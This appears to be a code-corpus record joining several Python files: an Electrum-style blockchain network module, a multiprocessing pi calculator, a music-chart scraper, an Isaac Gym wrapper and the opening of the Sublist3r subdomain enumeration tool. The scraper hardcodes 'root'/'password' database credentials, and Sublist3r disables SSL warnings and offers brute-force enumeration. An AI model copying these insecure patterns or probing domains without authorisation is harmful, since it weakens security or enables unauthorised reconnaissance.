self.disconnected_servers = set([])
self.protocol = protocol
self.set_proxy(proxy)
self.start_interfaces()
def stop_network(self):
self.print_error("stopping network")
for interface in list(self.interfaces.values()):
self.close_interface(interface)
if self.interface:
self.close_interface(self.interface)
assert self.interface is None
assert not self.interfaces
self.connecting = set()
# Get a new queue - no old pending connections thanks!
self.socket_queue = queue.Queue()
def set_parameters(self, host, port, protocol, proxy, auto_connect):
proxy_str = serialize_proxy(proxy)
server = serialize_server(host, port, protocol)
# sanitize parameters
try:
deserialize_server(serialize_server(host, port, protocol))
if proxy:
proxy_modes.index(proxy["mode"]) + 1
int(proxy['port'])
except:
return
self.config.set_key('auto_connect', auto_connect, False)
self.config.set_key("proxy", proxy_str, False)
self.config.set_key("server", server, True)
# abort if changes were not allowed by config
if self.config.get('server') != server or self.config.get('proxy') != proxy_str:
return
self.auto_connect = auto_connect
if self.proxy != proxy or self.protocol != protocol:
# Restart the network defaulting to the given server
self.stop_network()
self.default_server = server
self.start_network(protocol, proxy)
elif self.default_server != server:
self.switch_to_interface(server)
else:
self.switch_lagging_interface()
self.notify('updated')
def switch_to_random_interface(self):
'''Switch to a random connected server other than the current one'''
servers = self.get_interfaces() # Those in connected state
if self.default_server in servers:
servers.remove(self.default_server)
if servers:
self.switch_to_interface(random.choice(servers))
def switch_lagging_interface(self):
'''If auto_connect and lagging, switch interface'''
if self.server_is_lagging() and self.auto_connect:
# switch to one that has the correct header (not height)
header = self.blockchain().read_header(self.get_local_height())
filtered = list(map(lambda x:x[0], filter(lambda x: x[1].tip_header==header, self.interfaces.items())))
if filtered:
choice = random.choice(filtered)
self.switch_to_interface(choice)
def switch_to_interface(self, server):
'''Switch to server as our interface. If no connection exists nor
being opened, start a thread to connect. The actual switch will
happen on receipt of the connection notification. Do nothing
if server already is our interface.'''
self.default_server = server
if server not in self.interfaces:
self.interface = None
self.start_interface(server)
return
i = self.interfaces[server]
if self.interface != i:
self.print_error("switching to", server)
# stop any current interface in order to terminate subscriptions
# fixme: we don't want to close headers sub
#self.close_interface(self.interface)
self.interface = i
self.send_subscriptions()
self.set_status('connected')
self.notify('updated')
def close_interface(self, interface):
if interface:
if interface.server in self.interfaces:
self.interfaces.pop(interface.server)
if interface.server == self.default_server:
self.interface = None
interface.close()
def add_recent_server(self, server):
# list is ordered
if server in self.recent_servers:
self.recent_servers.remove(server)
self.recent_servers.insert(0, server)
self.recent_servers = self.recent_servers[0:20]
self.save_recent_servers()
def process_response(self, interface, response, callbacks):
if self.debug:
self.print_error("<--", response)
error = response.get('error')
result = response.get('result')
method = response.get('method')
params = response.get('params')
# We handle some responses; return the rest to the client.
if method == 'server.version':
interface.server_version = result
elif method == 'blockchain.headers.subscribe':
if error is None:
self.on_notify_header(interface, result)
elif method == 'server.peers.subscribe':
if error is None:
self.irc_servers = parse_servers(result)
self.notify('servers')
elif method == 'server.banner':
if error is None:
self.banner = result
self.notify('banner')
elif method == 'server.donation_address':
if error is None:
self.donation_address = result
elif method == 'blockchain.estimatefee':
if error is None and result > 0:
i = params[0]
fee = int(result*COIN)
self.config.update_fee_estimates(i, fee)
self.print_error("fee_estimates[%d]" % i, fee)
self.notify('fee')
elif method == 'blockchain.relayfee':
if error is None:
self.relay_fee = int(result * COIN)
self.print_error("relayfee", self.relay_fee)
elif method == 'blockchain.block.get_chunk':
self.on_get_chunk(interface, response)
elif method == 'blockchain.block.get_header':
self.on_get_header(interface, response)
for callback in callbacks:
callback(response)
def get_index(self, method, params):
""" hashable index for subscriptions and cache"""
return str(method) + (':' + str(params[0]) if params else '')
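# e.g. (illustration): get_index('blockchain.scripthash.subscribe', ['ab12...'])
# -> 'blockchain.scripthash.subscribe:ab12...', while get_index('server.banner', [])
# -> 'server.banner' (no params, no suffix).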
def process_responses(self, interface):
responses = interface.get_responses()
for request, response in responses:
if request:
method, params, message_id = request
k = self.get_index(method, params)
# client requests go through self.send() with a
# callback, are only sent to the current interface,
# and are placed in the unanswered_requests dictionary
client_req = self.unanswered_requests.pop(message_id, None)
if client_req:
assert interface == self.interface
callbacks = [client_req[2]]
else:
# fixme: will only work for subscriptions
k = self.get_index(method, params)
callbacks = self.subscriptions.get(k, [])
# Copy the request method and params to the response
response['method'] = method
response['params'] = params
# Only once we've received a response to an addr subscription
# add it to the list; avoids double-sends on reconnection
if method == 'blockchain.scripthash.subscribe':
self.subscribed_addresses.add(params[0])
else:
if not response: # Closed remotely / misbehaving
self.connection_down(interface.server)
break
# Rewrite response shape to match subscription request response
method = response.get('method')
params = response.get('params')
k = self.get_index(method, params)
if method == 'blockchain.headers.subscribe':
response['result'] = params[0]
response['params'] = []
elif method == 'blockchain.scripthash.subscribe':
response['params'] = [params[0]] # addr
response['result'] = params[1]
callbacks = self.subscriptions.get(k, [])
# update cache if it's a subscription
if method.endswith('.subscribe'):
self.sub_cache[k] = response
# Response is now in canonical form
self.process_response(interface, response, callbacks)
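# Illustration of the notification rewrite above (header value is made up):
# an incoming {'method': 'blockchain.headers.subscribe', 'params': [header]}
# notification leaves this loop as {'method': ..., 'params': [], 'result': header},
# the same shape a direct subscription request/response would have.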
def addr_to_scripthash(self, addr):
h = bitcoin.address_to_scripthash(addr)
if h not in self.h2addr:
self.h2addr[h] = addr
return h
def overload_cb(self, callback):
def cb2(x):
x2 = x.copy()
p = x2.pop('params')
addr = self.h2addr[p[0]]
x2['params'] = [addr]
callback(x2)
return cb2
def subscribe_to_addresses(self, addresses, callback):
hashes = [self.addr_to_scripthash(addr) for addr in addresses]
msgs = [('blockchain.scripthash.subscribe', [x]) for x in hashes]
self.send(msgs, self.overload_cb(callback))
def request_address_history(self, address, callback):
h = self.addr_to_scripthash(address)
self.send([('blockchain.scripthash.get_history', [h])], self.overload_cb(callback))
def send(self, messages, callback):
'''Messages is a list of (method, params) tuples'''
messages = list(messages)
with self.lock:
self.pending_sends.append((messages, callback))
def process_pending_sends(self):
# Requests need connectivity. If we don't have an interface,
# we cannot process them.
if not self.interface:
return
with self.lock:
sends = self.pending_sends
self.pending_sends = []
for messages, callback in sends:
for method, params in messages:
r = None
if method.endswith('.subscribe'):
k = self.get_index(method, params)
# add callback to list
l = self.subscriptions.get(k, [])
if callback not in l:
l.append(callback)
self.subscriptions[k] = l
# check cached response for subscriptions
r = self.sub_cache.get(k)
if r is not None:
util.print_error("cache hit", k)
callback(r)
else:
message_id = self.queue_request(method, params)
self.unanswered_requests[message_id] = method, params, callback
def unsubscribe(self, callback):
'''Unsubscribe a callback to free object references to enable GC.'''
# Note: we can't unsubscribe from the server, so if we receive
# subsequent notifications process_response() will emit a harmless
# "received unexpected notification" warning
with self.lock:
for v in self.subscriptions.values():
if callback in v:
v.remove(callback)
def connection_down(self, server):
'''A connection to server either went down, or was never made.
We distinguish by whether it is in self.interfaces.'''
self.disconnected_servers.add(server)
if server == self.default_server:
self.set_status('disconnected')
if server in self.interfaces:
self.close_interface(self.interfaces[server])
self.notify('interfaces')
for b in self.blockchains.values():
if b.catch_up == server:
b.catch_up = None
def new_interface(self, server, socket):
# todo: get tip first, then decide which checkpoint to use.
self.add_recent_server(server)
interface = Interface(server, socket)
interface.blockchain = None
interface.tip_header = None
interface.tip = 0
interface.mode = 'default'
interface.request = None
self.interfaces[server] = interface
self.queue_request('blockchain.headers.subscribe', [], interface)
if server == self.default_server:
self.switch_to_interface(server)
#self.notify('interfaces')
def maintain_sockets(self):
'''Socket maintenance.'''
# Responses to connection attempts?
while not self.socket_queue.empty():
server, socket = self.socket_queue.get()
if server in self.connecting:
self.connecting.remove(server)
if socket:
self.new_interface(server, socket)
else:
self.connection_down(server)
# Send pings and shut down stale interfaces
# must use copy of values
for interface in list(self.interfaces.values()):
if interface.has_timed_out():
self.connection_down(interface.server)
elif interface.ping_required():
params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, interface)
now = time.time()
# nodes
if len(self.interfaces) + len(self.connecting) < self.num_server:
self.start_random_interface()
if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
self.print_error('network: retrying connections')
self.disconnected_servers = set([])
self.nodes_retry_time = now
# main interface
if not self.is_connected():
if self.auto_connect:
if not self.is_connecting():
self.switch_to_random_interface()
else:
if self.default_server in self.disconnected_servers:
if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
self.disconnected_servers.remove(self.default_server)
self.server_retry_time = now
else:
self.switch_to_interface(self.default_server)
else:
if self.config.is_fee_estimates_update_required():
self.request_fee_estimates()
def request_chunk(self, interface, idx):
interface.print_error("requesting chunk %d" % idx)
self.queue_request('blockchain.block.get_chunk', [idx], interface)
interface.request = idx
interface.req_time = time.time()
def on_get_chunk(self, interface, response):
'''Handle receiving a chunk of block headers'''
error = response.get('error')
result = response.get('result')
params = response.get('params')
if result is None or params is None or error is not None:
interface.print_error(error or 'bad response')
return
# Ignore unsolicited chunks
index = params[0]
if interface.request != index:
return
connect = interface.blockchain.connect_chunk(index, result)
# If not finished, get the next chunk
if not connect:
self.connection_down(interface.server)
return
if interface.blockchain.height() < interface.tip:
self.request_chunk(interface, index+1)
else:
interface.request = None
interface.mode = 'default'
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.notify('updated')
def request_header(self, interface, height):
#interface.print_error("requesting header %d" % height)
self.queue_request('blockchain.block.get_header', [height], interface)
interface.request = height
interface.req_time = time.time()
def on_get_header(self, interface, response):
'''Handle receiving a single block header'''
header = response.get('result')
if not header:
interface.print_error(response)
self.connection_down(interface.server)
return
height = header.get('block_height')
if interface.request != height:
interface.print_error("unsolicited header",interface.request, height)
self.connection_down(interface.server)
return
chain = blockchain.check_header(header)
if interface.mode == 'backward':
if chain:
interface.print_error("binary search")
interface.mode = 'binary'
interface.blockchain = chain
interface.good = height
next_height = (interface.bad + interface.good) // 2
else:
if height == 0:
self.connection_down(interface.server)
next_height = None
else:
interface.bad = height
interface.bad_header = header
delta = interface.tip - height
next_height = max(0, interface.tip - 2 * delta)
elif interface.mode == 'binary':
if chain:
interface.good = height
interface.blockchain = chain
else:
interface.bad = height
interface.bad_header = header
if interface.bad != interface.good + 1:
next_height = (interface.bad + interface.good) // 2
elif not interface.blockchain.can_connect(interface.bad_header, check_height=False):
self.connection_down(interface.server)
next_height = None
else:
branch = self.blockchains.get(interface.bad)
if branch is not None:
if branch.check_header(interface.bad_header):
interface.print_error('joining chain', interface.bad)
next_height = None
elif branch.parent().check_header(header):
interface.print_error('reorg', interface.bad, interface.tip)
interface.blockchain = branch.parent()
next_height = None
else:
interface.print_error('checkpoint conflicts with existing fork', branch.path())
branch.write('', 0)
branch.save_header(interface.bad_header)
interface.mode = 'catch_up'
interface.blockchain = branch
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
bh = interface.blockchain.height()
next_height = None
if bh > interface.good:
if not interface.blockchain.check_header(interface.bad_header):
b = interface.blockchain.fork(interface.bad_header)
self.blockchains[interface.bad] = b
interface.blockchain = b
interface.print_error("new chain", b.checkpoint)
interface.mode = 'catch_up'
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
assert bh == interface.good
if interface.blockchain.catch_up is None and bh < interface.tip:
interface.print_error("catching up from %d"% (bh + 1))
interface.mode = 'catch_up'
next_height = bh + 1
interface.blockchain.catch_up = interface.server
self.notify('updated')
elif interface.mode == 'catch_up':
can_connect = interface.blockchain.can_connect(header)
if can_connect:
interface.blockchain.save_header(header)
next_height = height + 1 if height < interface.tip else None
else:
# go back
interface.print_error("cannot connect", height)
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
next_height = height - 1
if next_height is None:
# exit catch_up state
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.switch_lagging_interface()
self.notify('updated')
else:
raise BaseException(interface.mode)
# If not finished, get the next header
if next_height:
if interface.mode == 'catch_up' and interface.tip > next_height + 50:
self.request_chunk(interface, next_height // 2016)
else:
self.request_header(interface, next_height)
else:
interface.mode = 'default'
interface.request = None
self.notify('updated')
# refresh network dialog
self.notify('interfaces')
def maintain_requests(self):
for interface in list(self.interfaces.values()):
if interface.request and time.time() - interface.req_time > 20:
interface.print_error("blockchain request timed out")
self.connection_down(interface.server)
continue
def wait_on_sockets(self):
# Python docs say Windows doesn't like empty selects.
# Sleep to prevent busy looping
if not self.interfaces:
time.sleep(0.1)
return
rin = [i for i in self.interfaces.values()]
win = [i for i in self.interfaces.values() if i.num_requests()]
try:
rout, wout, xout = select.select(rin, win, [], 0.1)
except socket.error as e:
# TODO: py3, get code from e
code = None
if code == errno.EINTR:
return
raise
assert not xout
for interface in wout:
interface.send_requests()
for interface in rout:
self.process_responses(interface)
def init_headers_file(self):
b = self.blockchains[0]
if b.get_hash(0) == bitcoin.GENESIS:
self.downloading_headers = False
return
filename = b.path()
def download_thread():
try:
import urllib.request, socket
socket.setdefaulttimeout(30)
self.print_error("downloading ", bitcoin.HEADERS_URL)
urllib.request.urlretrieve(bitcoin.HEADERS_URL, filename + '.tmp')
os.rename(filename + '.tmp', filename)
self.print_error("done.")
except Exception:
self.print_error("download failed. creating file", filename)
open(filename, 'wb+').close()
b = self.blockchains[0]
with b.lock: b.update_size()
self.downloading_headers = False
self.downloading_headers = True
t = threading.Thread(target = download_thread)
t.daemon = True
t.start()
def run(self):
self.init_headers_file()
while self.is_running() and self.downloading_headers:
time.sleep(1)
while self.is_running():
self.maintain_sockets()
self.wait_on_sockets()
self.maintain_requests()
self.run_jobs() # Synchronizer and Verifier
self.process_pending_sends()
self.stop_network()
self.on_stop()
def on_notify_header(self, interface, header):
height = header.get('block_height')
if not height:
return
interface.tip_header = header
interface.tip = height
if interface.mode != 'default':
return
b = blockchain.check_header(header)
if b:
interface.blockchain = b
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
return
b = blockchain.can_connect(header)
if b:
interface.blockchain = b
b.save_header(header)
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
return
tip = max([x.height() for x in self.blockchains.values()])
if tip >= 0:
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
self.request_header(interface, min(tip, height - 1))
else:
chain = self.blockchains[0]
if chain.catch_up is None:
chain.catch_up = interface
interface.mode = 'catch_up'
interface.blockchain = chain
self.request_header(interface, 0)
def blockchain(self):
if self.interface and self.interface.blockchain is not None:
self.blockchain_index = self.interface.blockchain.checkpoint
return self.blockchains[self.blockchain_index]
def get_blockchains(self):
out = {}
for k, b in self.blockchains.items():
r = list(filter(lambda i: i.blockchain==b, list(self.interfaces.values())))
if r:
out[k] = r
return out
def follow_chain(self, index):
blockchain = self.blockchains.get(index)
if blockchain:
self.blockchain_index = index
self.config.set_key('blockchain_index', index)
for i in self.interfaces.values():
if i.blockchain == blockchain:
self.switch_to_interface(i.server)
break
else:
raise BaseException('blockchain not found', index)
if self.interface:
server = self.interface.server
host, port, protocol, proxy, auto_connect = self.get_parameters()
host, port, protocol = server.split(':')
self.set_parameters(host, port, protocol, proxy, auto_connect)
def get_local_height(self):
return self.blockchain().height()
def synchronous_get(self, request, timeout=30):
q = queue.Queue()
self.send([request], q.put)
try:
r = q.get(True, timeout)
except queue.Empty:
raise BaseException('Server did not answer')
if r.get('error'):
raise BaseException(r.get('error'))
return r.get('result')
def broadcast(self, tx, timeout=30):
tx_hash = tx.txid()
try:
out = self.synchronous_get(('blockchain.transaction.broadcast', [str(tx)]), timeout)
except BaseException as e:
return False, "error: " + str(e)
if out != tx_hash:
return False, "error: " + out
return True, out
|
pi.py | # Version of the Python Pi example using multiprocessing.
# Dr Owain Kenway
import time
import sys
from multiprocessing import Process, Queue, cpu_count
# We define a function to calculate the area in a chunk so that we can assign
# it to each process.
# n - the _TOTAL_ number of slices.
# lower - the lowest number of the slice.
# upper - the upper limit so that index < upper
# q - a queue to communicate back on.
def pi_chunk(n, lower, upper, q):
step = 1.0 / n
p = step * sum(4.0/(1.0 + ((i + 0.5) * (i + 0.5) * step * step)) for i in range(lower, upper))
q.put(p)
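# A quick serial sanity check of the same midpoint-rule sum (hypothetical usage):
#   q = Queue()
#   pi_chunk(1000000, 0, 1000000, q)   # one chunk covering every slice
#   print(q.get())                     # ~3.141592653589...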
# Our usual main. The docs imply this is _not_ optional for multiprocessing but
# I've not tested this...
if __name__=='__main__':
num_steps = 10000000 # number of slices
# Default to the number of processors exposed by cpu_count().
# Note, on systems with SMT/Hyperthreading turned on, this is a number of
# hardware threads, not real cores.
procs = cpu_count()
q = Queue() # Queue to communicate on
processes = [] # List where we will store our processes
decomp_debug = False # Show debugging?
# First argument is number of slices as normal. Second argument is number of
# processes to launch. ANY third argument enables debug mode to check
# decomposition.
if len(sys.argv) > 1:
num_steps = int(sys.argv[1])
if len(sys.argv) > 2:
procs = int(sys.argv[2])
if len(sys.argv) > 3:
decomp_debug = True
# Usual output.
print("Calculating PI using:\n " + str(num_steps) + " slices")
print(" " + str(procs) + " processes")
# Get initial time.
start = time.time()
# Loop over the number of processes, calculating lower and upper bounds for
# indices. Create a process object for each range and add it to the list then
# start it.
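# For example (illustration): num_steps=10, procs=4 gives index ranges
# [0,2), [2,5), [5,7), [7,10); the last upper bound is forced to num_steps
# below so no slices are lost to integer truncation.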
for a in range(procs):
l = int(a * (num_steps/procs))
u = int((a + 1) * (num_steps/procs))
if (a == (procs - 1)):
u = num_steps # Correct for slight integer div issues.
if (decomp_debug):
print(str(a) + " lower: " + str(l) + " upper: " + str(u))
processes.append(Process(target=pi_chunk, args=(num_steps, l, u,q)))
processes[a].start()
# Create a list of results and then get procs number of results from the queue.
# Because of the algorithm, we don't care which order we get the results in.
ps = []
for a in range(procs):
ps.append(q.get())
if (decomp_debug):
print(ps)
# Join all the processes.
for a in range(procs):
processes[a].join()
# Calculate overall result, stop clock.
p = sum(ps)
stop = time.time()
# Print our results.
print("Obtained value of PI: " + str(p))
print("Time taken: " + str(stop - start) + " seconds")
|
main.py | from bs4 import BeautifulSoup
import requests
import itertools
import threading
import json
import datetime
import apple_scraper
import spotify_scraper
import mysql.connector
import os
import json
from mysql.connector import errorcode
sem = threading.Semaphore()
total = 0
counter = 0
try:
mydb = mysql.connector.connect(
host="127.0.0.1",
user="root",
passwd="password",
database="spopplechart"
)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
apple_links = {}
spotify_links = {}
def apple_playlist_scraper(apple_links):
global counter
for country, links in apple_links.items():
sem.acquire()
print("Scraping Apple data for " + country + " (" + str(counter) + " out of " + str(total) + ")", )
sem.release()
source = requests.get(links).text
soup = BeautifulSoup(source, 'lxml')
songs = []
albums = []
artists = []
artworks = []
count = 0
for count, song in enumerate(soup.find_all('div', class_='songs-list-row__song-name')):
songs.append(str(count + 1) + '.' + song.text)
# isAlbum if False
isAlbum = False
for artist_album in soup.find_all('div', class_='songs-list__song-link-wrapper'):
if (isAlbum):
originalText = (artist_album.text).split()
albums.append(" ".join(originalText).replace(" ,", ","))
isAlbum = False
continue
else:
originalText = (artist_album.text).split()
artists.append(" ".join(originalText).replace(" ,", ","))
isAlbum = True
for artwork in soup.find_all('div', class_='media-artwork-v2--tracklist'):
if artwork.picture.source['srcset'] != "":
artworks.append(artwork.picture.source['srcset'].split()[0])
else:
artworks.append(artwork.picture.source['data-srcset'].split()[0])
for (song,album,artist,artwork) in zip(songs,albums,artists,artworks):
mycursor = mydb.cursor()
sql = "INSERT INTO chart_record (date,country,position, song, album, artists, artwork, spotify, applemusic) VALUE (%s,%s,%s,%s,%s,%s,%s,%s,%s)"
val = (datetime.datetime.now().date(),country,song.split('.', 1)[0], song.split('.', 1)[1], album, artist, artwork, 0, 1)
try:
mycursor.execute(sql,val)
mydb.commit()
except:
pass  # insert failed (most likely a duplicate record); skip it
counter += 1
def spotify_playlist_scraper(spotify_links):
global counter
for country, links in spotify_links.items():
playlist_id = links.split("/").pop()
sem.acquire()
print("Scraping Spotify data for " + country + " (" + str(counter) + " out of " + str(total) + ")", )
sem.release()
source = requests.get("https://open.spotify.com/playlist/" + playlist_id).text
soup = BeautifulSoup(source, 'lxml')
songs = []
albums = []
artists = []
artworks = []
position = 1
for song in soup.find_all('a', class_='eWYxOj'):
songs.append(str(position) + "." + song.text)
position += 1
for artist in soup.find_all('span', class_='Row__Subtitle-sc-brbqzp-1'):
artists.append(artist.text)
# for album in (json.loads(soup.find('script', id='initial-state').text)['entities']['items']['spotify:playlist:' + playlist_id]['tracks']['items']):
# albums.append(album['track']['album']['name'])
# for artwork in (json.loads(soup.find('script', id='initial-state').text)['entities']['items']['spotify:playlist:' + playlist_id]['tracks']['items']):
# artworks.append(artwork['track']['album']['images'][2]['url'])
for (song, album, artist, artwork) in zip(songs, albums, artists, artworks):
mycursor = mydb.cursor()
sql = "INSERT INTO chart_record (date,country,position, song, album, artists, artwork, spotify, applemusic) VALUE (%s,%s,%s,%s,%s,%s,%s,%s,%s)"
val = (datetime.datetime.now().date(), country, song.split('.', 1)[0], song.split('.', 1)[1], album, artist, artwork, 1, 0)
try:
mycursor.execute(sql,val)
mydb.commit()
print("[Committed]", song, 'by', artist + ' (Album:', album + ')')
except:
print("[Skipped] Duplicate record found")
counter += 1
def main():
global total
PATH = "./scraper_generated_apple_playlist.json"
if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
f = open('scraper_generated_apple_playlist.json')
apple_links = json.load(f)
else:
print("Either the file is missing or not readable")
apple_scraper.main()
PATH = "./scraper_generated_spotify_playlist.json"
if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
f = open('scraper_generated_spotify_playlist.json')
spotify_links = json.load(f)
else:
print("Either the file is missing or not readable")
spotify_scraper.main()
total = len(spotify_links) + len(apple_links) - 2
try:
thread_one = threading.Thread(target=spotify_playlist_scraper, args=(spotify_links, ))
thread_two = threading.Thread(target=apple_playlist_scraper, args=(apple_links, ))
thread_one.start()
thread_two.start()
thread_one.join()
thread_two.join()
except:
print("Error: unable to start thread")
main() |
IsaacGym_OLD.py | import multiprocessing as mp
import sys
import isaacgym
import numpy as np
import torch # import torch after import IsaacGym modules
from elegantrl.envs.utils_OLD.config import set_seed, get_args, parse_sim_params, load_cfg
from elegantrl.envs.utils_OLD.parse_task import parse_task
from typing import Tuple
dir((isaacgym, torch))
"""
isaacgym/gymdeps.py", line 21, in _import_deps
raise ImportError("PyTorch was imported before isaacgym modules.
Please import torch after isaacgym modules.")
;
run the following code in bash before running.
export LD_LIBRARY_PATH=/xfs/home/podracer_steven/anaconda3/envs/rlgpu/lib
can't use os.environ['LD_LIBRARY_PATH'] = /xfs/home/podracer_steven/anaconda3/envs/rlgpu/lib
cd isaacgym/python/ElegantRL-1212
conda activate rlgpu
export LD_LIBRARY_PATH=~/anaconda3/envs/rlgpu/lib
"""
class IsaacVecEnv:
def __init__(
self, env_name, env_num=32, device_id=0, rl_device_id=None, if_print=True
):
"""Preprocess an Isaac Gym vector environment for RL training.
[Isaac Gym](https://developer.nvidia.com/isaac-gym)
NVIDIA Isaac Gym. Preview 2
"""
"""env_name"""
sys_argv = sys.argv # build a pure sys.argv for IsaacGym args = get_args()
sys.argv = sys.argv[:1] # build a pure sys.argv for IsaacGym args = get_args()
env_target_return_dict = {
"Ant": 14e3, # 16e3
"Humanoid": 9e3, # 11e3
}
assert env_name in env_target_return_dict
args = get_args(task_name=env_name, headless=True)
# set after `args = get_args()` # get_args() in .../utils/config.py
rl_device_id = device_id if rl_device_id is None else rl_device_id
args.rl_device = f"cuda:{rl_device_id}" if rl_device_id >= 0 else "cpu"
args.device_id = device_id # PhyX device
args.num_envs = env_num # in `.../cfg/train/xxx.yaml`, `numEnvs`
# set before load_cfg()
cfg, cfg_train, log_dir = load_cfg(args)
sim_params = parse_sim_params(args, cfg, cfg_train)
set_seed(cfg_train["params"]["seed"])
task, env = parse_task(args, cfg, cfg_train, sim_params)
assert env_num == env.num_environments
sys.argv = sys_argv # build a pure sys.argv for IsaacGym args = get_args()
"""max_step"""
max_step = getattr(task, "max_episode_length", None)
if max_step is None:
max_step = getattr(task, "_max_episode_steps")
"""if_discrete"""
# import gym
# if_discrete = isinstance(env.act_space, gym.spaces.Discrete)
if_discrete = "float" not in str(env.action_space.dtype)
"""state_dim"""
state_dim = task.num_obs
assert isinstance(state_dim, int)
"""action_dim"""
if if_discrete:
action_dim = env.action_space.n
else:
action_dim = task.num_actions
assert all(env.action_space.high == np.ones(action_dim))
assert all((-env.action_space.low) == np.ones(action_dim))
"""target_return"""
target_return = env_target_return_dict[env_name]
self.device = torch.device(env.rl_device)
self.env = env
self.env_num = env_num
self.env_name = env_name
self.state_dim = state_dim
self.action_dim = action_dim
self.if_discrete = if_discrete
self.target_return = target_return
if if_print:
env_args = {
"env_num": env_num,
"env_name": env_name,
"max_step": max_step,
"state_dim": state_dim,
"action_dim": action_dim,
"if_discrete": if_discrete,
"target_return": target_return,
}
env_args_repr = repr(env_args)
env_args_repr = env_args_repr.replace(",", ",\n ")
env_args_repr = env_args_repr.replace("{", "{\n ")
env_args_repr = env_args_repr.replace("}", ",\n}")
print(f"env_args = {env_args_repr}")
def reset(self) -> torch.Tensor:
return self.env.reset()
def step(
self, actions: torch.Tensor
) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, None]:
return self.env.step(actions)
class IsaacOneEnv(IsaacVecEnv):
def __init__(self, env_name, device_id=0, if_print=True):
"""Preprocess an Isaac Gym single environment for RL evaluating.
[Isaac Gym](https://developer.nvidia.com/isaac-gym)
NVIDIA Isaac Gym. Preview 2
"""
super().__init__(
env_name=env_name,
env_num=1,
device_id=device_id,
rl_device_id=-1,
if_print=if_print,
)
def reset(self) -> np.ndarray:
ten_states = self.env.reset()
return ten_states[0].detach().numpy() # state
def step(
self, action: np.ndarray
) -> Tuple[np.ndarray, np.ndarray, np.ndarray, None]:
ten_action = torch.as_tensor(action, dtype=torch.float32).unsqueeze(0)
ten_state, ten_reward, ten_done, info_dict = self.env.step(ten_action)
state = ten_state[0].detach().numpy()
reward = ten_reward[0].item()
done = ten_done[0].item()
return state, reward, done, info_dict
"""check"""
def run_isaac_env(env_name="Ant", if_vec_env=True):
# from elegantrl.envs.IsaacGym import IsaacVecEnv, IsaacOneEnv
# env = IsaacVecEnv(env_name='Ant', env_num=32, device_id=0, if_print=True)
env_func = IsaacVecEnv if if_vec_env else IsaacOneEnv
if env_name == "Ant":
env_args = {
"env_num": 32,
"env_name": "Ant",
"max_step": 1000,
"state_dim": 60,
"action_dim": 8,
"if_discrete": False,
"target_return": 14000.0,
"device_id": None, # set by worker
"if_print": False, # if_print=False in default
}
elif env_name == "Humanoid":
env_args = {
"env_num": 32,
"env_name": "Humanoid",
"max_step": 1000,
"state_dim": 108,
"action_dim": 21,
"if_discrete": False,
"target_return": 9000.0,
"device_id": None, # set by worker
"if_print": False, # if_print=False in default
}
else:
raise KeyError(f"| run_isaac_env: env_name={env_name}")
if not if_vec_env:
env_args["env_num"] = 1
# from elegantrl.train.config import build_env
# env = build_env(env=None, env_func=env_func, env_args=env_args)
from elegantrl.train.config import check_env
env = check_env(env=None, env_func=env_func, env_args=env_args, gpu_id=0)
dir(env)
def run_isaac_gym_multiple_process():
process_list = [mp.Process(target=run_isaac_env, args=("Ant", True))] # VecEnv
process_list.append(
mp.Process(
target=run_isaac_env,
args=("Ant", False),
)
) # OneEnv
mp.set_start_method(method="spawn") # should be
[p.start() for p in process_list]
[p.join() for p in process_list]
if __name__ == "__main__":
run_isaac_env(env_name="Ant", if_vec_env=True)
# run_isaac_env(env_name='Ant', if_vec_env=False)
# run_isaac_gym_multiple_process()
|
sublist3r.py | #!/usr/bin/env python
# coding: utf-8
# Sublist3r v1.0
# By Ahmed Aboul-Ela - twitter.com/aboul3la
import argparse
import hashlib
import json
import multiprocessing
import os
import random
# modules in standard library
import re
import socket
import sys
import threading
import time
from collections import Counter
import dns.resolver
import requests
# external modules
from subbrute import subbrute
# Python 2.x and 3.x compatibility
if sys.version > "3":
import urllib.parse as urlparse
import urllib.parse as urllib
else:
import urllib # type: ignore
import urlparse # type: ignore
# In case you cannot install some of the required development packages
# there's also an option to disable the SSL warning:
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except:
pass
# Check if we are running this on windows platform
is_windows = sys.platform.startswith("win")
# Console Colors
if is_windows:
# Windows deserves coloring too :D
G = "\033[92m" # green
Y = "\033[93m" # yellow
B = "\033[94m" # blue
R = "\033[91m" # red
W = "\033[0m" # white
try:
import colorama
import win_unicode_console
win_unicode_console.enable()
colorama.init()
# Now the unicode will work ^_^
except:
print(
"[!] Error: Coloring libraries not installed, no coloring will be used [Check the readme]"
)
G = Y = B = R = W = ""
else:
G = "\033[92m" # green
Y = "\033[93m" # yellow
B = "\033[94m" # blue
R = "\033[91m" # red
W = "\033[0m" # white
def no_color():
global G, Y, B, R, W
G = Y = B = R = W = ""
def banner():
print(
"""%s
____ _ _ _ _ _____
/ ___| _ _| |__ | (_)___| |_|___ / _ __
\___ \| | | | '_ \| | / __| __| |_ \| '__|
___) | |_| | |_) | | \__ \ |_ ___) | |
|____/ \__,_|_.__/|_|_|___/\__|____/|_|%s%s
# Coded By Ahmed Aboul-Ela - @aboul3la
"""
% (R, W, Y)
)
def parser_error(errmsg):
banner()
print("Usage: python " + sys.argv[0] + " [Options] use -h for help")
print(R + "Error: " + errmsg + W)
sys.exit()
def parse_args():
# parse the arguments
parser = argparse.ArgumentParser(
epilog="\tExample: \r\npython " + sys.argv[0] + " -d google.com"
)
parser.error = parser_error
parser._optionals.title = "OPTIONS"
parser.add_argument(
"-d", "--domain", help="Domain name to enumerate it's subdomains", required=True
)
parser.add_argument(
"-b",
"--bruteforce",
help="Enable the subbrute bruteforce module",
nargs="?",
